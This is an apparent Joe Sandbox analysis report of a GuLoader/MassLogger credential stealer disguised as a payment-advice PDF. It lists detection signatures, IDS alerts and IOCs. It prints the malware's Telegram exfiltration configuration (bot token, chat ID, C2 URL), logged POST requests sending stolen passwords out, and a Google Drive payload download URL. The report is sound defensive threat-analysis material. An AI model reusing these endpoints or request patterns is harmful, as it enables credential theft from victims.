Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PAYMENT ADVICE TT07180016-24_pdf.exe

Overview

General Information

Sample name:PAYMENT ADVICE TT07180016-24_pdf.exe
Analysis ID:1576542
MD5:34dcd76e7a002a5f19d9842a70ba5c87
SHA1:188373e893907df10ccf54559d05b6bb98ccdcf4
SHA256:360acac9133b07ab36c79af7aa5e46850a97a297696bc812bfd25c4415ce4449
Tags:exeuser-lowmal3
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Initial sample is a PE file and has a suspicious name
Sample has a suspicious name (potential lure to open the executable)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\tropaeola.TelJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2032752399.0000000002900000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000004.00000002.2933469686.00000000016C0000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              Click to see the 4 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T08:43:15.858902+010020577441Malware Command and Control Activity Detected192.168.2.449747149.154.167.220443TCP
              2024-12-17T08:43:19.406922+010020577441Malware Command and Control Activity Detected192.168.2.449759149.154.167.220443TCP
              2024-12-17T08:43:22.807206+010020577441Malware Command and Control Activity Detected192.168.2.449766149.154.167.220443TCP
              2024-12-17T08:43:26.189057+010020577441Malware Command and Control Activity Detected192.168.2.449778149.154.167.220443TCP
              2024-12-17T08:43:29.522042+010020577441Malware Command and Control Activity Detected192.168.2.449784149.154.167.220443TCP
              2024-12-17T08:43:32.963762+010020577441Malware Command and Control Activity Detected192.168.2.449794149.154.167.220443TCP
              2024-12-17T08:43:36.317018+010020577441Malware Command and Control Activity Detected192.168.2.449805149.154.167.220443TCP
              2024-12-17T08:43:39.650464+010020577441Malware Command and Control Activity Detected192.168.2.449813149.154.167.220443TCP
              2024-12-17T08:43:42.965077+010020577441Malware Command and Control Activity Detected192.168.2.449825149.154.167.220443TCP
              2024-12-17T08:43:46.291647+010020577441Malware Command and Control Activity Detected192.168.2.449834149.154.167.220443TCP
              2024-12-17T08:43:49.603821+010020577441Malware Command and Control Activity Detected192.168.2.449844149.154.167.220443TCP
              2024-12-17T08:43:52.956466+010020577441Malware Command and Control Activity Detected192.168.2.449852149.154.167.220443TCP
              2024-12-17T08:43:56.280424+010020577441Malware Command and Control Activity Detected192.168.2.449861149.154.167.220443TCP
              2024-12-17T08:43:59.665974+010020577441Malware Command and Control Activity Detected192.168.2.449871149.154.167.220443TCP
              2024-12-17T08:44:02.995888+010020577441Malware Command and Control Activity Detected192.168.2.449880149.154.167.220443TCP
              2024-12-17T08:44:06.403244+010020577441Malware Command and Control Activity Detected192.168.2.449890149.154.167.220443TCP
              2024-12-17T08:44:09.804010+010020577441Malware Command and Control Activity Detected192.168.2.449899149.154.167.220443TCP
              2024-12-17T08:44:13.335584+010020577441Malware Command and Control Activity Detected192.168.2.449910149.154.167.220443TCP
              2024-12-17T08:44:16.782812+010020577441Malware Command and Control Activity Detected192.168.2.449918149.154.167.220443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T08:43:05.227378+010028032742Potentially Bad Traffic192.168.2.449738158.101.44.24280TCP
              2024-12-17T08:43:13.633618+010028032742Potentially Bad Traffic192.168.2.449738158.101.44.24280TCP
              2024-12-17T08:43:17.383645+010028032742Potentially Bad Traffic192.168.2.449753158.101.44.24280TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T08:42:58.326935+010028032702Potentially Bad Traffic192.168.2.449736172.217.19.174443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
              Source: PAYMENT ADVICE TT07180016-24_pdf.exe.7788.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
              Source: PAYMENT ADVICE TT07180016-24_pdf.exeReversingLabs: Detection: 50%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747D1EC CryptUnprotectData,4_2_3747D1EC
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_3747D9D9 CryptUnprotectData,4_2_3747D9D9
              Source: PAYMENT ADVICE TT07180016-24_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49739 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.200.225:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: PAYMENT ADVICE TT07180016-24_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405846
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 3747C985h4_2_3747C638
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37471042h4_2_37470C28
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37470671h4_2_374703AF
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37471042h4_2_37470F6F
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 3747EA48h4_2_3747E79F
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 3747E198h4_2_3747DEE1
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 3747C041h4_2_3747BD88
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37471042h4_2_37470C1A
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 3747B791h4_2_3747B4EC
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 3747E5F0h4_2_3747E339
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 3747EEA0h4_2_3747EBF7
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 3747DD40h4_2_3747DA89
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 3747BBE9h4_2_3747B944
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 3747C499h4_2_3747C1F2
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 3747F2F8h4_2_3747F042
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 3747B339h4_2_3747B07F
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 3752882Dh4_2_37528650
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 375291B7h4_2_37528650
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then push 00000000h4_2_3752BDF0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37524218h4_2_37523F70
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 375261B8h4_2_37525F10
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37526A68h4_2_375267C0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37521250h4_2_37520FA8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37525908h4_2_37525660
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 375230B8h4_2_37522E10
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37523968h4_2_375236C0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37522808h4_2_37522560
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37525058h4_2_37524DB0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37526EC0h4_2_37526C18
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 375216A8h4_2_37521400
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37527770h4_2_375274C8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37521F58h4_2_37521CB0
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_37527B4F
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37526610h4_2_37526368
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37523DC0h4_2_37523B18
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37524670h4_2_375243C8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37523510h4_2_37523268
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 375254B0h4_2_37525208
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37525D60h4_2_37525AB8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 375223B0h4_2_37522108
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37522C60h4_2_375229B8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37521B00h4_2_37521858
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37527318h4_2_37527070
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then jmp 37524ACAh4_2_37524820
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then push 00000000h4_2_37A5E7C8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]4_2_37A5F5D8
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeCode function: 4x nop then push 00000000h4_2_37A5F316

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49747 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49794 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49759 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49813 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49834 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49880 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49778 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49805 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49825 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49766 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49899 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49844 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49784 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49871 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49910 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49861 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49852 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49890 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49918 -> 149.154.167.220:443
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1e448cf4571dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1e7283a76d25Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1e9d6fdd08c3Host: api.telegram.orgContent-Length: 1090
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1ec81d1bdcb8Host: api.telegram.orgContent-Length: 1090
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1ef12d1812ccHost: api.telegram.orgContent-Length: 1090
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f1a00c07bebHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f43f2bafc9cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f6c4e620d42Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1f946ce6ca9cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1fbc5054d7f6Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1fe54a740e43Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd2010a61c1fbbHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd203e5f0cc69eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd20739cdded1dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd20b042e931e1Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd20f1af2d3636Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd214717f9b5d8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd21a75f8a832eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd223092f2d6dcHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
              Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49753 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 172.217.19.174:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16Wlyd_Vqizy5l4oyBE1RXq9ib6gP2vmD HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=16Wlyd_Vqizy5l4oyBE1RXq9ib6gP2vmD&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
